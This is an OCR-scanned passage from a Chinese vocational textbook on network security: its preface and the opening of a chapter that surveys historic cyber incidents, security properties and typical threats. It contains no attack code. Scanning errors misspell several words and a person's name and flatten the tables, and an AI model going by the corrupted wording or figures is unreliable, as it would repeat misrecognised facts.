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用 


从 1999 年 开始 ,高 等 学 校 连续 进行 了 十 几 年 的 大 规模 扩招 ,大 学 教育 
也 开始 由 精英 教育 转 为 大 众 化 教育 。 随 着 教学 对 象 .教学 目标 和 教学 环境 
的 转变 ,传统 的 教学 内 容 、 教 学 方法 和 教学 手段 已 不 再 适合 高 等 教育 的 
需要 。 

计算 机 网 络 的 出 现 改 变 了 人 们 使 用 计算 机 的 方式 ,也 改变 了 人 们 的 学 
习 , 工 作 和 生活 方式 。 计 算 机 网 络 给 和 人们 带 来 便利 的 同时 ,也 面 对 着 保证 网 
络 安全 的 巨大 挑战 。 据 统计 ,截至 2016 年 6 月 底 ,我 国 网 民 规 模 已 达到 
7.1 亿 人 ,其 中 手机 网 民 规 模 达 6. 56 亿 , 互 联网 普及 率 为 51. 7%。81. 64% 
的 网 民 不 注 意 定 期 更 换 密码 ,其 中 遇 到 问题 才 更 换 密码 的 占 64. 59% ,从 不 
更 换 密码 的 占 17. 05%;75. 93% 的 网 民 存 在 多 账户 使 用 同一 密码 的 问题 ; 
80.21% 的 网 民 随 意 连接 公共 免费 WiFi;83.48% 的 网 民 网 上 支付 行为 存在 
安全 隐患 ;36. 96% 的 网 民 对 二 维 码 “经 常 扫 , 不 考虑 是 否 安全 ”;55. 18% 的 
网 民 曾 遭遇 网 络 诈骗 。 这 些 数据 进一步 说 明 , 普 及 全 民 的 网 络 安全 意识 仍 
然 任 重 而 道 远 。 

“网 络 安全 技术 ”已 成 为 高 职 院 校 计算 机 及 相关 专业 的 重要 必修 课程 。 
本 书 根据 高 等 职业 教育 的 特点 ,基于 “项 目 引 导 , 任 务 驱动 ”的 项 目 化 教学 方 
式 编写 而 成 ,体现 了 “基于 工作 过 程 “ 教 .学 、 做 ”一 体 化 的 教学 理念 。 全 书 
内 容 划 分 为 11 个 工程 项 目 , 具 体内 容 包 括 : 认识 计算 机 网 络 安 全 技术 、 
Windows Server 2008 系统 安全 加 固 、 网 络 协议 与 分 析 、 计 算 机 病毒 及 防治 、 
密码 技术 、 网 络 攻 击 与 防范 、 防 火 墙 技术 、 入 侵 检 测 技术 、VPN 技术 、Web 安 
全 无 线 网 络 安 全 等 。 本 书 具 有 以 下 特点 。 

(1) 体现 “项目 引 导 、 任 务 驱动 ”教学 特点 。 从 实际 应 用 出 发 ,从 工作 过 
程 出 发 ,从 项 目 出 发 ,采用 ”项目 引导 、 任 务 驱动 ”的 方式 ,通过 * 提 出 问题 ”~ 
“分 析 问 题 * 一 “解决 问题 ”>“ 拓 展 提 高 ”四 部 曲 展开 。 在 宏观 教学 设计 上 突 
破 以 知识 点 的 层次 递 进 为 理论 体系 的 传统 模式 ,将 职业 工作 过 程 系统 化 ,以 
工作 过 程 为 参照 ,按照 工作 过 程 来 组 织 和 讲解 知识 ,培养 学 生 的 职业 技能 和 
职业 素养 。 

(2) 体现 “教学 、 做 ”一 体 化 的 教学 理念 。 以 学 到 实用 技能 、 提 高 职业 
能 力 为 出 发 点 ,以 “做 ”为 中 心 ,“ 教 "和 “学 ”都 围绕 着 “做 ”, 在 学 中 做 ,在 做 中 
学 ,从 而 完成 知识 学 习 、 技 能 训练 和 提高 职业 素养 的 教学 目标 。 


ll 
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(3) 本 书 体例 采用 项 目 、 任 务 形式 。 全 书 设 有 11 个 工程 项 目 ,每 一 个 项 目 再 明确 若干 
任务 。 教 学 内 容 安排 由 易 到 难 、 由 简单 到 复杂 ,层次 推进 ,循序 渐进 。 学 生 能 够 通过 项 目 学 
习 , 完 成 相关 知识 的 学 习 和 技能 的 训练 。 每 个 项 目 来 自 企 业 工 程 实践 ,具有 典型 性 和 实 
用 性 。 

(4) 项 目 /任务 的 内 容 体现 趣味 性 .实用 性 和 可 操作 性 。 趣 味 性 使 学 生 始 终 保 持 较 高 的 
学 习 兴 趣 和 动力 ;实用 性 使 学 生 能 学 以 致 用 ;可 操作 性 保证 每 个 项 目 / 任 务 能 顺利 完成 。 本 
书 的 讲解 力求 贴近 口语 ,让 学 生 感 到 易学 . 乐 学 ,在 宽松 环境 中 理解 知识 .掌握 技能 。 

(5) 紧 跟 行业 技术 的 发 展 。 网 络 安全 技术 发 展 很 快 ,本 书 着 力 于 当前 主流 技术 和 新 技 
术 的 讲解 ,与 行业 联系 密切 ,使 所 有 内 容 紧 跟 行业 技术 的 发 展 。 

(6) 符合 高 职 学 生 的 认 知 规律 ,有 助 于 实现 有 效 教学 ,提高 教学 的 效率 、 效 益 、 效 果 。 本 
书 打破 了 传统 的 学 科 体 系 结构 ,将 各 个 知识 点 与 操作 技能 恰当 地 融入 各 个 项 目 /任务 中 , 突 
出 现代 职业 教育 的 职业 性 和 实践 性 ,注重 培养 学 生 实践 中 的 动手 能 力 ,以 便 适应 高 职 学 生 的 
学 习 特点 。 同 时 ,在 教学 过 程 中 注意 情感 交流 ,因材施教 ,调动 学 生 的 学 习 积 极 性 ,提高 教学 
效果 。 

(7) 本 书 中 相关 任务 操作 对 实验 环境 的 要 求 比较 低 , 采 用 常见 的 设备 和 软件 即 可 完成 ， 
便于 实施 。 为 了 方便 操作 和 保护 系统 安全 ,本 书 中 的 大 部 分 任务 操作 均 可 在 Windows 
Server 2008/Windows 7 虚拟 机 中 完成 ,部 分 任务 操作 要 在 Windows 2000 Server 虚拟 机 中 
完成 ,所 用 的 工具 软件 均 可 在 互联 网 上 下 载 。 

本 书 由 黄 林 国 主编 并 统 稿 ,参加 编写 的 还 有 解 卫 华 .类 淑敏 . 黄 倩 . 王 振 邦 、 凌 代 红 , 张 丽 君 、 
陈 邦 荣 、 林 龙 、 腾 圣 敏 . 夏 文明 , 沈 爱 着 , 张 康 . 件 伟 文 等 。 在 本 书 的 编写 过 程 中 ,参考 了 大 量 
的 书籍 和 互联 网 上 的 资料 ,在 此 ,作者 谨 向 这 些 书 籍 和 资料 的 作者 表示 感谢 。 

为 了 便于 教学 ,本 书 提供 的 PPT 课件 等 教学 资源 ,可 以 从 清华 大 学 出 版 社 网 站 
(http://www. tup. com. cn) 免 费 下 载 使 用 。 

由 于 编者 水 平 有 限 , 书 中 难免 存在 朴 漏 , 敬 请 读者 批评 指正 。 联 系 方式 huanglgvip@ 


21cn. com 。 


编 者 
2017 年 2 月 
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项 目 1 认识 计算 机 网 络 安全 技术 


【项 目 目标 】 


(1) 掌握 网 络 安 全 的 定义 和 主要 威胁 。 

(2) 了 解 网 络 安全 的 现状 和 主要 影响 因素 。 

(3) 了 解 网 络 安全 所 涉及 的 主要 内 容 。 

(4) 了 解 PDRR 模型 、 安 全 策略 设计 原则 和 网 络 安全 保障 技术 。 
(5) 了 解 网 络 安全 标准 。 

(6) 掌握 VMware 虚拟 机 技术 的 使 用 方法 。 

(7) 了 解 基本 物理 安全 。 


11 项 目 提 出 


据 国外 媒体 报道 ,全 球 计算 机 行业 协会 CCompTIA) 近日 评 出 了 * 全 球 最 急需 的 10 项 
IT 技术 ”, 结 果 安 全 和 防火 墙 技术 排 名 首位 。 

据 CompTIA 近日 公布 的 《全球 IT 技术 状况 ?报告 显示 ,安全 /防火 墙 /数据 隐私 类 技术 
排名 首位 ,而 网 络 技术 位 居 第 二 。 

全 球 最 急需 的 10 项 IT 技术 如 下 : 

(1) 安全 /防火 墙 /数据 隐私 类 技术 ; 

(2) 网 络 /网 络 基础 设施 ; 

(3) 操作 系统 ; 

(4) 硬件 ; 

(5) 非特 定性 服务 器 技术 ; 

(6) 软件 ; 

(7) 应 用 层面 技术 ; 

(8) 特定 编程 语言 

(9) Web 技术 ; 

(10) RF 移动 /无 线 技术 。 

由 上 可 见 , 排 名 第 一 的 就 是 安全 问题 ,这 说 明 安全 方面 的 问题 是 全 世界 都 孤 待 解决 的 问 
题 , 可 想 而 知人 们 所 面临 的 网 络 安全 状况 有 多 篮 众 。 
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12 项 目 分 析 


计算 机 网 络 近年 来 获得 了 飞速 的 发 展 ,在 网 络 高 速 发 展 的 过 程 中 ,网 络 技术 的 日 趋 成 熟 
使 得 网 络 连接 更 加 容易 ,人 们 在 享受 网 络 带 来 便利 的 同时 ,网 络 的 安全 也 日 益 受到 威胁 。 

互联 网 和 网 络 应 用 以 飞快 的 速度 不 断 发 展 ,网 络 应 用 日 益 普及 并 更 加 复杂 ,网 络 安全 问 
题 是 互联 网 和 网 络 应 用 发 展 中 面临 的 重要 问题 。 网 络 攻击 行为 日 趋 复杂 ,各 种 方法 相互 融 
合 , 使 网 络 安全 防御 更 加 困难 。 黑 客 攻 击 行为 组 织 性 更 强 ,攻击 目标 从 单纯 地 追求 “荣耀 感 ” 
向 获取 多 方面 实际 利益 的 方向 转移 ,网 上 木马 .间谍 程序 、 恶 意 网 站 、 网 络 仿冒 等 的 出 现 并 日 
趋 泛滥 ;智能 手机 、 平 板 计算 机 等 无 线 终端 的 处 理 能 力 和 功能 通用 性 的 提高 ,使 其 日 趋 接 近 
个 人 计算 机 ,针对 这 些 无 线 终端 的 网 络 攻击 已 经 开始 出 现 ,并 将 进一步 发 展 。 

总 之 ,网 络 安全 问题 变 得 更 加 错综复杂 ,影响 将 不 断 扩大 ,很 难 在 短期 内 得 到 全 面 解 决 。 
安全 问题 已 经 摆 在 了 非常 重要 的 位 置 上 ,网 络 安全 威胁 如 果 不 加 以 防范 ,会 严重 影响 到 网 络 
的 应 用 。 


13 相关 知识 点 


1.3.1 网 络 安全 概述 


1. 网 络 安全 的 重要 性 

尽管 网 络 的 重要 性 已 经 被 广泛 认同 ,但 对 网 络 安全 的 忽视 仍 很 普遍 ,缺乏 网 络 安全 意识 
的 状况 仍然 十 分 严峻 。 不 少 企 事业 单位 极为 重视 网 络 硬 件 的 投资 ,但 没有 意识 到 网 络 安全 
的 重要 性 ,对 网 络 安全 的 投资 较为 音 冀 。 这 也 使 得 目前 不 少 网 络 信 息 系统 都 存在 先天 性 的 
安全 漏洞 和 安全 威胁 ,有 些 甚至 产生 了 非常 严重 的 后 果 。 下 面 是 近年 来 发 生 的 一 些 重 大 网 
络 信 息 安全 事件 。 

1995 年 , 米 特 尼克 冯 和 许多 计算 机 网 络 ,偷窃 了 20000 个 信用 卡号 ,他 曾 间 入 “北美 空 
中 防务 指挥 系统 ”, 破 译 了 美国 著名 的 “太平 洋 电 话 公司 ”在 南 加 利 福 尼 亚 州 通信 网 络 的 “ 改 
户 密码 ”, 入 侵 过 美国 DEC 等 5 家 大 公司 的 网 络 ,造成 8000 万 美元 的 损失 。 

1999 年 ,我 国 台湾 省 的 大 学 生 陈 一 豪 制 造 的 CIH 病毒 在 4 月 26 日 发 作 ,引起 全 球 震 
撼 ,有 6000 多 万 台 计算 机 受害 。 

2002 年 ,黑客 用 DDoS 攻击 影响 了 13 个 DNS 服务 器 中 的 8 个 ,作为 整个 Internet 通信 
路 标的 关键 系统 遭 到 严重 的 破坏 。 

2006 年 ,熊猫 烧香 ”木马 致使 我 国 数 百 万 计算 机 用 户 受到 感染 ,并 波及 周边 国家 。 
2007 年 2 月 ,“ 熊 猫 烧香 ”制作 者 李 俊 被 捕 。 

2008 年 ,一 个 全 球 性 的 黑客 组 织 利 用 ATM 欺诈 程序 ,一 夜 之 间 从 世界 49 个 城市 的 银 
行 中 盗 走 了 900 万 美元 。 

2009 年 ,韩国 遭受 有 史 以 来 最 猛烈 的 一 次 黑客 攻击 。 韩 国 总 统 府 、 国 会 .国情 院 和 国防 
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部 等 国家 机 关 , 以 及 金融 界 .媒体 和 防火 墙 企业 网 站 遭受 攻击 ,造成 网 站 一 度 无 法 访问 。 

2010 年 ,维基 解密 ”网 站 在 《纽约 时 报 兴 卫 报 》 和 (《 镜 报 》 配 合 下 ,在 网 上 公开 了 多 达 
9.2 万 份 的 驻 阿 美军 秘密 文件 ,引起 轩然大波 。 

2011 年 , 堪 称 中 国 互 联网 史上 最 大 泄密 事件 发 生 。12 月 中 旬 ,CSDN 网 站 用 户 数据 库 
被 黑客 在 网 上 公开 ,大约 600 万 个 注册 邮箱 账号 和 与 之 对 应 的 明文 密码 泄露 。2012 年 1 月 
12 日 ,两 名 涉嫌 CSDN 泄密 的 嫌疑 人 被 刑事 拘留 。 其 中 一 名 为 北京 籍 黑客 , 另 一 名 为 外 地 
黑客 。 

2013 年 6 月 ,前 中 情 局 (CIA) 职 员 爱 德 华 。 斯 诺 登 曝光 美国 国家 安全 局 的 “棱镜 ”项目 ， 
该 项 目 为 秘密 项 目 , 在 之 前 的 6 年间, 美国 国家 安全 局 和 联邦 调查 局 通过 进入 微软 ,谷歌 , 苹 
果 、 雅 虎 等 九 大 网 络 巨头 的 服务 器 ,监控 美国 公民 的 电子 邮件 、 聊 天 记录 、 视 频 及 照片 等 秘密 
资料 。 

2014 年 12 月 25 日 ,乌云 漏洞 报告 平台 的 报告 称 ,大 量 12306 用 户 数据 在 互联 网 上 疯 
传 ,内 容 包 括 用 户 账号 、 明 文 密码 、 身 份 证 号 码 、 手 机 号 码 和 电子 邮箱 等 。 这 次 事件 是 黑客 首 
先 通过 收集 互联 网 某 游戏 网 站 以 及 其 他 多 个 网 站 泄露 的 用 户 名 和 密码 信息 ,然后 通过 撞 
库 @ 的 方式 利用 12306 的 安全 机 制 的 漏洞 获取 了 这 13 万 多 条 用 户 数据 。 

2015 年 12 月 23 日 ,乌克兰 发 生 了 一 次 影响 很 大 的 通过 有 组 织 、 有 预谋 的 定向 网 络 攻 
击 致 使 乌克兰 境内 近 1/3 的 地 区 持续 断 电 的 安全 事件 。 

2016 年 5 月 7 日 ,根据 路 透 社 报道 ,黑客 在 黑市 上 交易 高 达 27 230 万 条 被 盗 的 邮件 
用 户 名 和 密码 ,其 中 包括 5700 万 条 俄罗斯 Mail ru 邮件 账户 .4000 万 条 雅虎 邮件 账户 、 
3300 万 条 Hotmail 邮件 账户 以 及 240 万 条 Gmail 邮件 账户 。 另 外 ,还 包括 成 千 上 万 的 德国 
和 中 国 的 电子 邮件 账户 ,以 及 数 以 千 计 的 涉及 美国 银行 业 、 制 造 业 和 零售 业 公司 员工 的 用 户 
名 和 密码 。 

以 上 仅仅 是 一 些 个 案 ,事实 上 ,这 样 的 案例 不 胜 枚 举 , 而 且 计 算 机 犯罪 案件 有 逐年 增加 
的 趋势 。 据 美国 的 一 项 研究 显示 ,全 球 互联 网 每 39 秒 就 发 生 了 一 次 黑客 事件 ,其 中 大 部 分 
黑客 没有 固定 的 目标 。 

因此 ,网 络 系统 必须 有 足够 强大 的 安全 体系 ,无 论 是 局 域 网 还 是 广域网 ,无 论 是 单位 还 
是 个 人 ,网 络 安全 的 目标 是 全 方位 防范 各 种 威胁 以 确保 网 络 信息 的 保密 性 .完整 性 和 可 
用 性 。 

2. 网 络 安全 的 现状 

现今 Internet 环境 正在 发 生 着 一 系列 的 变化 ,安全 问题 也 出 现 了 相应 的 变化 ,主要 反映 
在 以 下 几 个 方面 。 

(1) 网 络 犯罪 成 为 集团 化 .产业 化 的 趋势 。 从 灰 铝 子 病毒 案例 可 以 看 出 ,木马 从 制作 到 
最 终 盗 取 用 户 信息 甚至 财物 ,渐渐 成 为 一 条 产业 链 。 

(2) 无 线 网 络 智能 手机 成 为 新 的 攻击 区 域 . 新 的 攻击 重点 。 随 着 无 线 网 络 的 大 力 推 
广 ,4G 网 络 使 用 人 群 的 增多 ,使 用 的 用 户 群体 也 在 不 断 地 增加 ,手机 病毒 .手机 恶意 软件 呈 
现 快速 增长 的 趋势 。 





@ 撞 库 是 指 黑客 利用 从 某 些 网 站 或 渠道 获取 的 用 户 账号 和 密码 ,在 其 他 网 站 上 进行 登录 尝试 。 这 主 
要 是 由 于 目前 有 相当 一 部 分 互联 网 用 户 喜欢 在 不 同 网 站 上 使 用 统一 的 用 户 名 和 密码 。 
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(3) 垃圾 邮件 依然 比较 严重 。 虽 然 经 过 这 么 多 年 的 垃圾 邮件 整治 ,垃圾 邮件 现象 得 到 
明显 改善 ,例如 美国 有 相应 的 立法 来 处 理 垃圾 邮件 ,但 是 在 利益 的 驱动 下 ,垃圾 邮件 仍然 影 
响 着 每 个 人 邮箱 的 使 用 。 

(4) 漏洞 攻击 的 爆发 时 间 变 短 。 从 近 几 年 发 生 的 攻击 来 看 ,不 难 发 现 漏洞 攻击 的 时 间 
越 来 越 短 ,系统 漏洞 网络 漏洞 .软件 漏洞 等 被 攻击 者 发 现 并 利用 的 时 间 间 隔 在 不 断 地 缩短 ， 
很 多 攻击 者 都 是 通过 这 些 漏洞 来 攻击 网 络 的 。 

(5) 攻击 方 的 技术 水 平 要 求 越 来 越 低 。 现 在 有 很 多 黑客 网 站 免费 提供 了 许多 攻击 工 
具 , 利 用 这 些 工 具 可 以 很 容易 地 实施 网 络 攻击 。 

(6) DoS(deny of service) 攻 击 更 加 频繁 。 由 于 DoS 攻击 更 加 隐蔽 ,难以 追踪 到 攻击 
者 ,大 多 数 攻击 者 采用 分 布 式 的 攻击 方式 和 跳板 攻击 方法 ,这 种 攻击 更 具有 威胁 性 ,攻击 更 
加 难以 防范 。 

(7) 针对 浏览 器 插件 的 攻击 。 插 件 的 性 能 不 是 由 浏览 器 来 决定 的 ,浏览 器 的 漏洞 升级 
并 不 能 解决 插件 可 能 存在 的 漏洞 。 

(8) 网 站 攻击 ,特别 是 网 页 被 挂 木马 。 大 多 数 用 户 在 打开 一 个 熟悉 的 网 站 时 ,比如 自己 
信任 的 网 站 ,但 是 这 个 网 站 被 挂 木马 ,在 不 经 意 间 木 马 将 会 安装 在 自己 的 计算 机 中 ,这 是 现 
在 网 站 攻击 的 主要 模式 。 

(9) 内 部 用 户 的 攻击 。 现 今 企 事业 单位 的 内 部 网 与 外 部 网 的 联系 越 来 越 紧密 ,来 自 内 
部 用 户 的 威胁 也 不 断 出 现 。 来 自 内 部 攻击 的 比例 在 不 断 上 升 , 变 成 内 部 网 络 的 一 个 防 灾 
重点 。 

据 国 家 互联 网 应 急 中 心 发 布 的 42015 年 中 国 互联 网 网 络 安全 报告 ) 中 显示 ,2015 年 , 国 
家 互联 网 应 急 中 心 共 接 收 境内 外 报告 的 网 络 安全 事件 126 916 起 , 较 2014 年 增长 了 
125.9% 。 其 中 ,境内 报告 网 络 安全 事件 126 424 起 , 较 2014 年 增长 了 128.6% ;境外 报告 网 
络 安全 事件 492 起 , 较 2014 年 下 降 43.9%。 发 现 的 网 络 安全 事件 中 ,数量 排 前 三 位 的 类 型 
分 别 是 网 页 仿冒 事件 ( 占 59. 8%) 、 漏 洞 事件 ( 占 20.2%) 和 网 页 自 改 事件 ( 占 9. 8%)。 

3. 网 络 安全 的 定义 

网 络 安全 是 指 计算 机 及 其 网 络 系统 资源 和 信息 资源 不 受 自 然 和 人 为 有 害 因素 的 威胁 和 
危害 , 即 指 计算 机 、 网 络 系统 的 硬件 和 软件 及 其 系统 中 的 数据 受到 保护 ,不 因 偶然 的 或 者 恶 
意 的 原因 而 遭 到 破坏 、 更 改 、 泄 露 , 确 保 系 统 能 连续 ,可靠 ,正常 地 运行 ,使 网 络 服务 不 中 断 。 

计算 机 网 络 安全 从 其 本 质 上 来 讲 就 是 系统 上 的 信息 安全 。 计 算 机 网 络 安全 是 一 门 涉及 
计算 机 科学 、 网 络 技术 ,密码 技术 、 信 息 安全 技术 、 应 用 数学 ,数论 信息论 等 多 种 学 科 的 综合 
性 科学 。 

从 广义 来 说 ,凡是 涉及 计算 机 网 络 上 信息 的 保密 性 、 完 整 性 、 可 用 性 、 可 控 性 和 不 可 否认 
性 的 相关 技术 和 理论 都 是 计算 机 网 络 安 全 的 研究 领域 。 

1) 保密 性 

保密 性 是 指 网 络 信息 不 被 泄露 给 非 授权 的 用 户 、 实 体 或 过 程 , 即 信息 只 为 授权 用 户 使 
用 。 即 使 非 授权 用 户 得 到 信息 也 无 法 知晓 信息 的 内 容 , 因 而 不 能 使 用 。 

2) 完整 性 

完整 性 是 指 维护 信息 的 一 致 性 , 即 在 信息 生成 ,传输 ,存储 和 使 用 过 程 中 不 发 生 人 为 或 
非 人 为 的 非 授 权 和 修改 。 
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3) 可 用 性 

可 用 性 是 指 授 权 用 户 在 需要 时 能 不 受 其 他 因素 的 影响 ,方便 地 使 用 所 需 信息 , 即 当 需要 
时 能 否 存 取 所 需 的 信息 。 这 一 目标 是 对 信息 系统 的 总 体 可 靠 性 要 求 。 例 如 ,网 络 环境 下 拒 
绝 服 务 .破坏 网 络 和 有 关系 统 的 正常 运行 等 都 属于 对 可 用 性 的 攻击 。 

4) 可 控 性 

可 控 性 是 指 对 网 络 系统 中 的 信息 传播 及 具体 内 容 能 够 实现 有 效 控制 , 即 网 络 系统 中 的 
任何 信息 要 在 一 定 传输 范围 和 存放 空间 内 可 控 。 

5) 不 可 否认 性 

不 可 否认 性 是 指 保 障 用 户 无 法 在 事后 否认 曾经 对 信息 进行 的 生成 ,签发 .接收 等 行为 ， 
一 般 通 过 数字 签名 来 提供 不 可 否认 服务 。 

从 网 络 运行 和 管理 者 角度 来 说 ,人 们 希望 对 本 地 网 络 信息 的 访问 、 读 / 写 等 操作 受到 保 
护 和 控制 ,避免 出 现 * 陷 门 ” 病 毒 .非法 存 取 、 拒 绝 服务 网络 资源 非法 占用 和 非法 控制 等 威 
胁 , 制 止 和 防御 网 络 黑客 的 攻击 。 对 安全 保密 部 门 来 说 ,它们 希望 对 非法 的 .有害 的 或 涉及 
国家 机 密 的 信息 进行 过 滤 和 防 堵 ,避免 机 要 信息 泄露 ,避免 对 社会 产生 危害 ,对 国家 造成 巨 
大 损失 。 从 社会 教育 和 意识 形态 角度 来 讲 , 网 络 上 不 健康 的 内 容 会 对 社会 的 稳定 和 人 类 的 
发 展 造成 阻碍 ,必须 对 其 进行 控制 。 

网 络 安全 问题 ,应 该 像 每 家 每 户 的 防火 、 防 次 问题 一 样 , 做 到 防 患 于 未 然 。 甚 至 不 会 想 
到 自己 也 会 成 为 目标 的 时 候 , 威 胁 就 已 经 出 现 了 ,一 旦 发 生 ,常常 令 人 措手不及 ,造成 极 大 的 

4. 网 络 安全 的 主要 威胁 

网 络 系统 的 安全 威胁 主要 表现 在 主机 可 能 会 受到 非法 入 侵 者 的 攻击 ,网 络 中 的 敏感 数 
据 有 可 能 泄露 或 被 修改 ,从 内 部 网 向 公共 网 传送 的 信息 可 能 被 他 人 窃听 自 改 等 。 典 型 的 网 
络 安全 威胁 如 表 1-1 所 示 。 

表 1-1 典型 的 网 络 安全 威胁 



































威 胁 含 义 
窃听 网 络 中 传输 的 敏感 信息 被 窃听 
重 传 攻击 者 事先 获得 部 分 或 全 部 信息 ,以 后 将 此 信息 发 送 给 接收 者 
伪造 攻击 者 将 伪造 的 信息 发 送 给 接收 者 
算 改 攻击 者 对 合法 用 户 之 间 的 通信 信息 进行 修改 ,删除 .插入 ,再 发 送 给 接收 者 
非 授权 访问 通过 假冒 、 身 份 攻击 、 系 统 漏洞 等 手段 获取 系统 访问 权 , 从 而 使 非法 用 户 进入 
网 络 系统 读 取 、 删 除 , 修 改 、 插 入 信息 等 
拒绝 服务 攻击 攻击 者 通过 某 种 方法 使 系统 响应 减 慢 甚 至 瘫痪 ,阻止 合法 用 户 获得 服务 
行为 否认 通信 实体 否认 已 经 发 生 的 行为 
旁 路 控制 攻击 者 发 掘 系统 的 缺陷 或 安全 脆弱 性 
电磁 /射频 截获 攻击 者 从 电子 或 机 电 设备 所 发 出 的 无 线 射频 或 其 他 电磁 辐射 中 提取 信息 
人 员 朴 忽 已 授权 人 为 了 自己 的 利益 或 由 于 粗心 将 信息 泄露 给 未 授权 人 
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5. 影响 网 络 安全 的 主要 因素 

影响 网 络 安全 的 因素 有 很 多 ,归纳 起 来 主要 有 以 下 一 些 因素 。 

1) 开放 性 的 网 络 环境 

网 络 特 点 正如 一 句 非 常 经 典 的 话 所 描述 的 :“Internet 的 美妙 之 处 在 于 你 和 每 个 人 都 能 
互相 连接 ,Internet 的 可 怕 之 处 在 于 每 个 人 都 能 和 你 互相 连接 。” 

Internet 是 一 个 开放 性 的 网 络 ,是 跨越 国界 的 ,这 意味 着 网 络 的 攻击 不 仅 来 自 本 地 网 络 
的 用 户 , 也 可 以 来 自 Internet 上 的 任何 一 台 机 器 。Internet 是 一 个 虚拟 的 世界 ,无 法 得 知 联 
机 的 另 一 端 是 谁 。 在 这 个 虚拟 的 世界 里 ,已 经 超越 了 国界 , 某 些 法 律 也 受到 了 挑战 ,因此 网 
络 安全 面临 的 是 一 个 国际 化 的 挑战 。 

网 络 建立 初期 只 考虑 方便 性 、 开 放 性 ,并 没有 考虑 总 体 安全 构架 ,任何 一 个 人 或 者 团体 
都 可 以 接 入 ,因而 网 络 所 面临 的 破坏 和 攻击 可 能 是 多 方面 的 。 例 如 ,可 能 是 对 物理 传输 线路 
的 攻击 ,可 能 是 对 操作 系统 漏洞 的 攻击 .可 能 是 对 网 络 通信 协议 的 攻击 ,也 可 能 是 对 硬件 的 
攻击 等 。 网 络 安全 已 成 为 信息 时 代 人 类 共同 面临 的 挑战 。 

2) 操作 系统 的 漏洞 

漏洞 是 可 以 在 攻击 过 程 中 利用 的 弱点 , 它 可 以 是 软件 、 硬 件 、 程 序 缺陷 、 功 能 设计 或 
者 配置 不 当 等 造成 的 。 黑 客 或 入侵 者 会 研究 分 析 这 些 漏洞 ,加 以 利用 而 获得 侵入 和 破坏 
的 机 会 。 

网 络 连接 离 不 开 网 络 操作 系统 ,操作 系统 可 能 存在 各 种 漏洞 ,有 很 多 网 络 攻击 的 方法 都 
是 从 寻找 操作 系统 的 漏洞 开始 的 。 

(1) 系统 模型 本 身 的 漏洞 。 这 是 系统 设计 初期 就 存在 的 ,无 法 通过 修改 操作 系统 程序 
的 源 代码 来 修补 。 

(2) 操作 系统 程序 的 源 代码 存在 漏洞 。 操 作 系 统 也 是 一 个 计算 机 程序 ,任何 一 个 程序 
都 可 能 存在 漏洞 ,操作 系统 也 不 例外 。 例 如 ,冲击 波 病毒 针对 的 是 Windows 操作 系统 的 
RPC 缓冲 区 溢出 漏洞 。 

(3) 操作 系统 程序 配置 不 当 。 许 多 操作 系统 的 默认 配置 的 安全 性 较 差 ,进行 安全 配置 
比较 复杂 并 且 需 要 一 定 的 安全 知识 ,许多 用 户 并 没有 这 方面 的 能 力 , 如 果 没有 正确 配置 这 些 
安全 功能 ,会 造成 一 些 系 统 的 安全 缺陷 。 

3) TCP/IP 协议 的 缺陷 

一 方面 ,该 协议 数据 流 采 用 明码 传输 ,上 且 传输 过 程 无 法 控制 ,这 就 为 他 人 截取 、 窃 听信 息 
提供 了 机 会 ; 男 一 方面 ,该 协议 在 设计 时 采用 协议 簇 的 基本 体系 结构 ,IP 地 址 作为 网 络 节点 
的 唯一 标识 ,不 是 固定 的 且 不 需要 身份 认证 。 因 此 攻击 者 就 有 了 可 乘 之 机 ,他 们 可 以 通过 修 
改 或 冒充 他 人 的 IP 地 址 进行 信息 的 拦截 、 窃 取 和 自 改 等 。 

4) 人 为 因素 

在 计算 机 使 用 过 程 中 ,使 用 者 的 安全 意识 缺乏 、 安 全 管理 措施 不 到 位 等 ,通常 是 网 络 安 
全 的 一 个 重大 隐患 。 例 如 ,隐秘 性 文件 未 设 密 ,操作 口令 的 泄露 ,重要 文件 的 丢失 等 都 会 给 
黑客 提供 攻击 的 机 会 。 对 于 系统 漏洞 的 不 及 时 修补 以 及 不 及 时 防 病毒 都 可 能 会 给 网 络 安全 
带 来 影响 。 

6 





项 目 1 认识 计算 机 网 络 安全 技术 





1.3.2 网 络 安全 所 涉及 的 内 容 


网 络 安全 是 一 门 交叉 学 科 , 除 了 涉及 数学 、 通 信 、 计 算 机 等 自然 科学 外 ,还 涉及 法 律 、 心 
理学 等 社会 科学 ,是 一 个 多 领域 的 复杂 系统 。 一 般 的 ,把 网 









































络 安 全 涉及 的 内 容 分 为 物理 安全 、 网 络 安全 ,系统 安全 应 er 
用 安全 ,管理 安全 5 个 方面 ,如 图 1-1 所 示 。 系统 安全 
1. 物理 安全 网 络 安全 
物理 安全 也 称 实体 安全 ,是 指 保护 计算 机 设备 ,设施 | 物理 安全 








(网 络 及 通信 线路 ) 免 遭 地 震 、 水 灾 、 火 灾 等 自然 灾害 和 环境 图 1-1 网 络 安全 所 涉及 的 内 容 
事故 (如 电磁 污染 等 ), 以 及 人 为 操作 失误 及 计算 机 犯罪 行 
为 导致 的 破坏 。 保 证 计算 机 信息 系统 各 种 设备 的 物理 安全 ,是 整个 计算 机 信息 系统 安全 的 
前 提 。 物 理 安全 主要 包括 以 下 3 个 方面 。 

(1) 环境 安全 : 对 系统 所 有 环境 的 安全 保护 ,如 区 域 保护 (电子 监控 ) 和 灾难 保护 (灾难 
的 预警 .应 急 处 理 ,恢复 等 )。 

(2) 设备 安全 : 主要 包括 设备 的 防盗 、 防 毁 ( 接 地 保护 )、 防 电磁 信息 辐射 泄漏 、 防 止 线 
路 截获 . 抗 电磁 干扰 及 电源 保护 等 。 

(3) 媒体 安全 : 包括 媒体 数据 的 安全 及 媒体 本 身 的 安全 。 

2. 网 络 安全 

网 络 安全 主要 包括 网 络 运 行 和 网 络 访问 控制 的 安全 ,如 表 1-2 所 示 。 


表 1-2 网 络 安全 的 组 成 




















访问 控制 (防火 墙 ) 
局 域 网 . 子 网 安全 
网 络 安全 检测 (入侵 检测 系统 ) 
网 络 中 数据 传输 安全 数据 加 密 (VPN 等 ) 
网 络 安全 备份 与 恢复 
网 络 运行 安全 
应 急 
TCP/IP 
网 络 协议 安全 
其 他 协议 











在 网 络 安全 中 ,在 内 部 网 与 外 部 网 之 间 ,可 以 设置 防火 墙 来 实现 内 外 网 的 隔离 和 访问 控 
制 ,是 保护 内 部 网 安全 的 最 主要 的 措施 ,同时 也 是 最 有 效 、 最 经 济 的 措施 之 一 。 网 络 安 全 检 
